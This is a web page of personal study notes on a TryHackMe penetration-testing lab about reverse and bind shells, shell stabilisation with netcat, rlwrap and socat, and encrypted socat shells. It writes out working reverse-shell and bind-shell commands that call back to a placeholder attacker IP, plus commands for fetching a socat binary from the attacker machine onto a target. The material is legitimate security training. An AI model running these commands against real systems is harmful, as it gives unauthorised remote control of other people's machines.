<!doctype html>
<html lang="en" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-Jr Penetration Tester/Privilege Escalation/What the Shell" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.2.0">
<title data-rh="true">What the Shell | THM Notes</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:image" content="https://thm.pochacco.top/img/Pochacco-social-card.png"><meta data-rh="true" name="twitter:image" content="https://thm.pochacco.top/img/Pochacco-social-card.png"><meta data-rh="true" property="og:url" content="https://thm.pochacco.top/docs/Jr Penetration Tester/Privilege Escalation/What the Shell"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="What the Shell | THM Notes"><meta data-rh="true" name="description" content="In the simplest possible terms, shells are what we use when interfacing with a Command Line environment (CLI). When targeting remote systems it is sometimes possible to force an application running on the server (such as a webserver, for example) to execute arbitrary code. When this happens, we want to use this initial access to obtain a shell running on the target."><meta data-rh="true" property="og:description" content="In the simplest possible terms, shells are what we use when interfacing with a Command Line environment (CLI). When targeting remote systems it is sometimes possible to force an application running on the server (such as a webserver, for example) to execute arbitrary code. When this happens, we want to use this initial access to obtain a shell running on the target."><link data-rh="true" rel="icon" href="/img/favicon.ico"><link data-rh="true" rel="canonical" href="https://thm.pochacco.top/docs/Jr Penetration Tester/Privilege Escalation/What the Shell"><link data-rh="true" rel="alternate" href="https://thm.pochacco.top/docs/Jr Penetration Tester/Privilege Escalation/What the Shell" hreflang="en"><link data-rh="true" rel="alternate" href="https://thm.pochacco.top/docs/Jr Penetration Tester/Privilege Escalation/What the Shell" hreflang="x-default"><link rel="stylesheet" href="/assets/css/styles.487c242f.css">
<script src="/assets/js/runtime~main.32f33024.js" defer="defer"></script>
<script src="/assets/js/main.7573ae7a.js" defer="defer"></script>
</head>
<body class="navigation-with-keyboard">
<script>!function(){function t(t){document.documentElement.setAttribute("data-theme",t)}var e=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return localStorage.getItem("theme")}catch(t){}}();t(null!==e?e:"light")}(),function(){try{const c=new URLSearchParams(window.location.search).entries();for(var[t,e]of c)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><nav aria-label="Main" class="navbar navbar--fixed-top"><div class="navbar__inner"><div class="navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/"><div class="navbar__logo"><img src="/img/logo.png" alt="PochaccoTop Logo" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/img/logo.png" alt="PochaccoTop Logo" class="themedComponent_mlkZ themedComponent--dark_xIcU"></div><b class="navbar__title text--truncate">TryHackMe Notes</b></a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/docs/Intro">TryHackme</a></div><div class="navbar__items navbar__items--right"><a href="https://index.pochacco.top/en/" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">Index<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a><a href="https://pochacco.top" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">MainSite<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a><a href="https://github.com/pikachu233666" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link header-github-link" aria-label="GitHub repository"></a><div class="toggle_vylO colorModeToggle_DEke"><button class="clean-btn toggleButton_gllP toggleButtonDisabled_aARS" type="button" disabled="" title="Switch between dark and light mode (currently light mode)" aria-label="Switch between dark and light mode (currently light mode)" aria-live="polite"><svg viewBox="0 0 24 24" width="24" height="24" class="lightToggleIcon_pyhR"><path fill="currentColor" d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" class="darkToggleIcon_wfgR"><path fill="currentColor" d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"></path></svg></button></div><div class="navbarSearchContainer_Bca1"></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="Scroll back to top" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd"><nav aria-label="Docs sidebar" class="menu thin-scrollbar menu_SIkG"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/docs/Intro">TryHackMe</a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Introduction to Cyber Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Pre Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Jr Penetration Tester</a></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Introduction to Cyber Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Pentesting/Pentesting Fundamentals">Introduction to Pentesting</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Authentication Bypass">Introduction to Web Hacking</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Burp Suite/Extensions">Burp Suite</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Network Security/Active Reconnaissance">Network Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Vulnerability Research/Exploit Vulnerabilities">Vulnerability Research</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Metasploit/Exploitation">Metasploit</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" tabindex="0" href="/docs/Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation">Privilege Escalation</a></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation">Linux Privilege Escalation</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/docs/Jr Penetration Tester/Privilege Escalation/What the Shell">What the Shell</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Privilege Escalation/Windows Privilege Escalation">Windows Privilege Escalation</a></li></ul></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Events/The Witch&#x27;s Cauldron">Events</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Others/Bash Scripting">Others</a></div></li></ul></nav></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="Breadcrumbs"><ul class="breadcrumbs" itemscope="" itemtype="https://schema.org/BreadcrumbList"><li class="breadcrumbs__item"><a aria-label="Home page" class="breadcrumbs__link" href="/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">Jr Penetration Tester</span><meta itemprop="position" content="1"></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">Privilege Escalation</span><meta itemprop="position" content="2"></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link" itemprop="name">What the Shell</span><meta itemprop="position" content="3"></li></ul></nav><div class="tocCollapsible_ETCw theme-doc-toc-mobile tocMobile_ITEo"><button type="button" class="clean-btn tocCollapsibleButton_TO0P">On this page</button></div><div class="theme-doc-markdown markdown"><p>#Skills</p>
<p>In the simplest possible terms, shells are what we use when interfacing with a Command Line environment (CLI). When targeting remote systems it is sometimes possible to force an application running on the server (such as a webserver, for example) to execute arbitrary code. When this happens, we want to use this initial access to obtain a shell running on the target.</p>
<p>In simple terms, we can force the remote server to either send us command line access to the server (a <strong>reverse</strong> shell), or to open up a port on the server which we can connect to in order to execute further commands (a <strong>bind</strong> shell).</p>
<h1>Tools</h1>
<p>There are a variety of tools that we will be using to receive reverse shells and to send bind shells. In general terms, we need malicious shell code, as well as a way of interfacing with the resulting shell.</p>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="netcat">Netcat<a href="#netcat" class="hash-link" aria-label="Direct link to Netcat" title="Direct link to Netcat">​</a></h2>
<p>Netcat is the traditional &quot;Swiss Army Knife&quot; of networking. It is used to manually perform all kinds of network interactions, including things like banner grabbing during enumeration, but more importantly for our uses, it can be used to receive reverse shells and connect to remote ports attached to bind shells on a target system. Netcat shells are very unstable (easy to lose) by default, but can be improved by techniques.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="socat">Socat<a href="#socat" class="hash-link" aria-label="Direct link to Socat" title="Direct link to Socat">​</a></h2>
<p>Socat is like netcat on steroids. It can do all of the same things, and <em>many</em> more. Socat shells are usually more stable than netcat shells out of the box. In this sense it is vastly superior to netcat; however, there are two big catches</p>
<ol>
<li>The syntax is more difficult</li>
<li>Netcat is installed on virtually every Linux distribution by default. Socat is very rarely installed by default.</li>
</ol>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="metasploit--multihandler">Metasploit--multi/handler<a href="#metasploit--multihandler" class="hash-link" aria-label="Direct link to Metasploit--multi/handler" title="Direct link to Metasploit--multi/handler">​</a></h2>
<p>The <code>exploit/multi/handler</code> module of the Metasploit framework is, like socat and netcat, used to receive reverse shells. Due to being part of the Metasploit framework, multi/handler provides a fully-fledged way to obtain stable shells, with a wide variety of further options to improve the caught shell. It&#x27;s also the only way to interact with a <em>meterpreter</em> shell, and is the easiest way to handle <em>staged</em> payloads.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="msfvenom">Msfvenom<a href="#msfvenom" class="hash-link" aria-label="Direct link to Msfvenom" title="Direct link to Msfvenom">​</a></h2>
<p>Like multi/handler, msfvenom is technically part of the Metasploit Framework, however, it is shipped as a standalone tool. Msfvenom is used to generate payloads on the fly.</p>
<hr>
<p>There are some repositories of shells in many different languages. One of the most prominent of these is <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" target="_blank" rel="noopener noreferrer">Payloads all the Things</a>. The PentestMonkey <a href="https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" target="_blank" rel="noopener noreferrer">Reverse Shell Cheatsheet</a> is also commonly used. In addition to these online resources, Kali Linux also comes pre-installed with a variety of webshells located at <code>/usr/share/webshells</code>. The <a href="https://github.com/danielmiessler/SecLists" target="_blank" rel="noopener noreferrer">SecLists repo</a>, though primarily used for wordlists, also contains some very useful code for obtaining shells.</p>
<h1>Types of Shell</h1>
<p>At a high level, we are interested in two kinds of shell when it comes to exploiting a target: Reverse shells, and bind shells.</p>
<ul>
<li><strong>Reverse shells</strong> are when the target is forced to execute code that connects <em>back</em> to your computer. On your own computer you would use one of the tools mentioned in the previous task to set up a <em>listener</em> which would be used to receive the connection. Reverse shells are a good way to bypass firewall rules that may prevent you from connecting to arbitrary ports on the target; however, the drawback is that, when receiving a shell from a machine across the internet, you would need to configure your own network to accept the shell.</li>
<li><strong>Bind shells</strong> are when the code executed on the target is used to start a listener attached to a shell directly on the target. This would then be opened up to the internet, meaning you can connect to the port that the code has opened and obtain remote code execution that way. This has the advantage of not requiring any configuration on your own network, but may be prevented by firewalls protecting the target.
As a general rule, reverse shells are easier to execute and debug.</li>
</ul>
<hr>
<p>Reverse Shell Example:
In reality, this is more likely to be done through code injection on a remote website or something along those lines.
On the attacking machine <code>sudo nc -lvnp 443</code><br>
<!-- -->On the target <code>nc &lt;LOCAL-IP&gt; &lt;PORT&gt; -e /bin/bash</code></p>
<p>Bind Shell Example:
First, we start a listener on the target -- this time we&#x27;re also telling it to execute <code>cmd.exe</code>. Then, with the listener up and running, we connect from our own machine to the newly opened port.
On the target <code>nc -lvnp &lt;port&gt; -e &quot;cmd.exe&quot;</code><br>
<!-- -->On the attacking machine <code>nc MACHINE_IP &lt;port&gt;</code></p>
<hr>
<p>Shells can be either <em>interactive</em> or <em>non-interactive</em>.</p>
<ul>
<li><em>Interactive:</em> If you&#x27;ve used Powershell, Bash, Zsh, sh, or any other standard CLI environment then you will be used to<br>
<!-- -->interactive shells. These allow you to interact with programs after executing them.</li>
<li><em>Non-Interactive</em> shells don&#x27;t give you that luxury. In a non-interactive shell you are limited to using programs which do not require user interaction in order to run properly. Unfortunately, the majority of simple reverse and bind shells are non-interactive, which can make further exploitation trickier.</li>
</ul>
<p><code>alias listener=&quot;sudo rlwrap nc -lvnp 443&quot;</code></p>
<h1>Netcat</h1>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="reverse-shells">Reverse Shells<a href="#reverse-shells" class="hash-link" aria-label="Direct link to Reverse Shells" title="Direct link to Reverse Shells">​</a></h2>
<p>Reverse shells require shellcode and a listener.
The syntax for starting a netcat listener using Linux is this:</p>
<p><code>nc -lvnp &lt;port-number&gt;</code></p>
<ul>
<li><strong>-l</strong> is used to tell netcat that this will be a listener</li>
<li><strong>-v</strong> is used to request a verbose output</li>
<li><strong>-n</strong> tells netcat not to resolve host names or use DNS.</li>
<li><strong>-p</strong> indicates that the port specification will follow.</li>
</ul>
<p>Be aware that if you choose to use a port below 1024, you will need to use <code>sudo</code> when starting your listener. That said, it&#x27;s often a good idea to use a well-known port number (80, 443 or 53 being good choices) as this is more likely to get past outbound firewall rules on the target.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="bind-shells">Bind Shells<a href="#bind-shells" class="hash-link" aria-label="Direct link to Bind Shells" title="Direct link to Bind Shells">​</a></h2>
<p>If we are looking to obtain a bind shell on a target then we can assume that there is already a listener waiting for us on a chosen port of the target: all we need to do is connect to it. The syntax for this is relatively straight forward:</p>
<p><code>nc &lt;target-ip&gt; &lt;chosen-port&gt;</code></p>
<p>Here we are using netcat to make an outbound connection to the target on our chosen port.</p>
<h1>Netcat Shell Stabilisation</h1>
<p>These shells are very unstable by default. Pressing Ctrl + C kills the whole thing. They are non-interactive, and often have strange formatting errors. This is due to netcat &quot;shells&quot; really being processes running <em>inside</em> a terminal, rather than being bonafide terminals in their own right. Fortunately, there are many ways to stabilise netcat shells on Linux systems. Stabilisation of Windows reverse shells tends to be significantly harder.</p>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="technique-1-python">Technique 1: Python<a href="#technique-1-python" class="hash-link" aria-label="Direct link to Technique 1: Python" title="Direct link to Technique 1: Python">​</a></h2>
<p>The first technique we&#x27;ll be discussing is applicable only to Linux boxes, as they will nearly always have Python installed by default. This is a three stage process:</p>
<ol>
<li>The first thing to do is use <code>python -c &#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</code>, which uses Python to spawn a better featured bash shell; note that some targets may need the version of Python specified. If this is the case, replace <code>python</code> with <code>python2</code> or <code>python3</code> as required. At this point our shell will look a bit prettier, but we still won&#x27;t be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell.</li>
<li>Step two is: <code>export TERM=xterm</code> -- this will give us access to term commands such as <code>clear</code>.</li>
<li>Finally (and most importantly) we will background the shell using Ctrl + Z. Back in our own terminal we use <code>stty raw -echo; fg</code>. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.</li>
</ol>
<p><img decoding="async" loading="lazy" alt="technique one" src="/assets/images/What_the_Shell_1-3d518918e87bc1c69d2251df9203df00.png" width="664" height="385" class="img_ev3q"></p>
<p>Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type <code>reset</code> and press enter.</p>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="technique-2-rlwrap">Technique 2: rlwrap<a href="#technique-2-rlwrap" class="hash-link" aria-label="Direct link to Technique 2: rlwrap" title="Direct link to Technique 2: rlwrap">​</a></h2>
<p>rlwrap is a program which, in simple terms, gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell_;_ however, s_ome_ manual stabilisation must still be utilised if you want to be able to use Ctrl + C inside the shell. rlwrap is not installed by default on Kali, so first install it with <code>sudo apt install rlwrap</code>.</p>
<p>To use rlwrap, we invoke a slightly different listener
<code>rlwrap nc -lvnp &lt;port&gt;</code></p>
<p>Prepending our netcat listener with &quot;rlwrap&quot; gives us a much more fully featured shell. This technique is particularly useful when dealing with Windows shells, which are otherwise notoriously difficult to stabilise. When dealing with a Linux target, it&#x27;s possible to completely stabilise, by using the same trick as in step three of the previous technique: background the shell with Ctrl + Z, then use <code>stty raw -echo; fg</code> to stabilise and re-enter the shell.</p>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="technique-3-socat">Technique 3: Socat<a href="#technique-3-socat" class="hash-link" aria-label="Direct link to Technique 3: Socat" title="Direct link to Technique 3: Socat">​</a></h2>
<p>The third easy way to stabilise a shell is quite simply to use an initial netcat shell as a stepping stone into a more fully-featured socat shell. Bear in mind that this technique is limited to Linux targets, as a Socat shell on Windows will be no more stable than a netcat shell. To accomplish this method of stabilisation we would first transfer a <a href="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true" target="_blank" rel="noopener noreferrer">socat static compiled binary</a> (a version of the program compiled to have no dependencies) up to the target machine. A typical way to achieve this would be using a webserver on the attacking machine inside the directory containing your socat binary (<code>sudo python3 -m http.server 80</code>), then, on the target machine, using the netcat shell to download the file. On Linux this would be accomplished with curl or wget (<code>wget &lt;LOCAL-IP&gt;/socat -O /tmp/socat</code>).</p>
<p>For the sake of completeness: in a Windows CLI environment the same can be done with Powershell, using either Invoke-WebRequest or a webrequest system class, depending on the version of Powershell installed (<code>Invoke-WebRequest -uri &lt;LOCAL-IP&gt;/socat.exe -outfile C:\\Windows\temp\socat.exe</code>).</p>
<hr>
<p>With any of the above techniques, it&#x27;s useful to be able to change your terminal tty size. This is something that your terminal will do automatically when using a regular shell; however, it must be done manually in a reverse or bind shell if you want to use something like a text editor which overwrites everything on the screen.</p>
<p>First, open another terminal and run <code>stty -a</code>. This will give you a large stream of output. Note down the values for &quot;rows&quot; and columns</p>
<p>Next, in your reverse/bind shell, type in
<code>stty rows &lt;number&gt;</code>   and <code>stty cols &lt;number&gt;</code></p>
<h1>Socat</h1>
<p>Socat is similar to netcat in some ways, but fundamentally different in many others. The easiest way to think about socat is as a connector between two points.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="reverse-shells-1">Reverse Shells<a href="#reverse-shells-1" class="hash-link" aria-label="Direct link to Reverse Shells" title="Direct link to Reverse Shells">​</a></h2>
<p>The syntax for a basic reverse shell listener in socat
<code>socat TCP-L:&lt;port&gt; -</code>
As always with socat, this is taking two points (a listening port, and standard input) and connecting them together. The resulting shell is unstable, but this will work on either Linux or Windows and is equivalent to <code>nc -lvnp &lt;port&gt;</code>.</p>
<p>On Windows we would use this command to connect back
<code>socat TCP:&lt;LOCAL-IP&gt;:&lt;LOCAL-PORT&gt; EXEC:powershell.exe,pipes</code></p>
<p>The &quot;pipes&quot; option is used to force powershell (or cmd.exe) to use Unix style standard input and output.</p>
<p>This is the equivalent command for a Linux Target
<code>socat TCP:&lt;LOCAL-IP&gt;:&lt;LOCAL-PORT&gt; EXEC:&quot;bash -li&quot;</code></p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="bind-shells-1">Bind Shells<a href="#bind-shells-1" class="hash-link" aria-label="Direct link to Bind Shells" title="Direct link to Bind Shells">​</a></h2>
<p>On a Linux target we would use the following command
<code>socat TCP-L:&lt;PORT&gt; EXEC:&quot;bash -li&quot;</code></p>
<p>On a Windows target we would use this command for our listener
<code>socat TCP-L:&lt;PORT&gt; EXEC:powershell.exe,pipes</code></p>
<p>We use the &quot;pipes&quot; argument to interface between the Unix and Windows ways of handling input and output in a CLI environment.</p>
<p>Regardless of the target, we use this command on our attacking machine to connect to the waiting listener.
<code>socat TCP:&lt;TARGET-IP&gt;:&lt;TARGET-PORT&gt; -</code></p>
<hr>
<p>Now let&#x27;s take a look at one of the more powerful uses for Socat: a fully stable Linux tty reverse shell. This will only work when the target is Linux, but is <em>significantly</em> more stable. Socat is an incredibly versatile tool; however, the following technique is perhaps one of its most useful applications. Here is the new listener syntax
<code>socat TCP-L:&lt;port&gt; FILE:`tty`,raw,echo=0</code></p>
<p>Let&#x27;s break this command down into its two parts. As usual, we&#x27;re connecting two points together. In this case those points are a listening port, and a file. Specifically, we are passing in the current TTY as a file and setting the echo to be zero. This is approximately equivalent to using the Ctrl + Z, <code>stty raw -echo; fg</code> trick with a netcat shell -- with the added bonus of being immediately stable and hooking into a full tty.</p>
<p>The first listener can be connected to with any payload; however, this special listener must be activated with a very specific socat command. This means that the target must have socat installed. Most machines do not have socat installed by default, however, it&#x27;s possible to upload a <a href="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true" target="_blank" rel="noopener noreferrer">precompiled socat binary</a>, which can then be executed as normal.</p>
<p>The special command is as follows
<code>socat TCP:&lt;attacker-ip&gt;:&lt;attacker-port&gt; EXEC:&quot;bash -li&quot;,pty,stderr,sigint,setsid,sane</code></p>
<p>The first part is easy -- we&#x27;re linking up with the listener running on our own machine. The second part of the command creates an interactive bash session with  <code>EXEC:&quot;bash -li&quot;</code>. We&#x27;re also passing the arguments: pty, stderr, sigint, setsid and sane</p>
<ul>
<li><strong>pty</strong>, allocates a pseudoterminal on the target -- part of the stabilisation process</li>
<li><strong>stderr</strong>, makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)</li>
<li><strong>sigint</strong>, passes any Ctrl + C commands through into the sub-process, allowing us to kill commands inside the shell</li>
<li><strong>setsid</strong>, creates the process in a new session</li>
<li><strong>sane</strong>, stabilises the terminal, attempting to &quot;normalise&quot; it.</li>
</ul>
<p>Note that the socat shell is fully interactive, allowing us to use interactive commands such as SSH. This can then be further improved by setting the stty values, which will let us use text editors such as Vim or Nano.</p>
<hr>
<p>If, at any point, a socat shell is not working correctly, it&#x27;s well worth increasing the verbosity by adding <code>-d -d</code> into the command. This is very useful for experimental purposes, but is not usually necessary for general use.</p>
<h1>Socat Encrypted Shells</h1>
<p>One of the many great things about socat is that it&#x27;s capable of creating encrypted shells -- both bind and reverse. Encrypted shells cannot be spied on unless you have the decryption key, and are often able to bypass an IDS as a result.</p>
<p>Suffice to say that any time <code>TCP</code> was used as part of a command, this should be replaced with <code>OPENSSL</code> when working with encrypted shells.</p>
<p>We first need to generate a certificate in order to use encrypted shells. This is easiest to do on our attacking machine
<code>openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt</code></p>
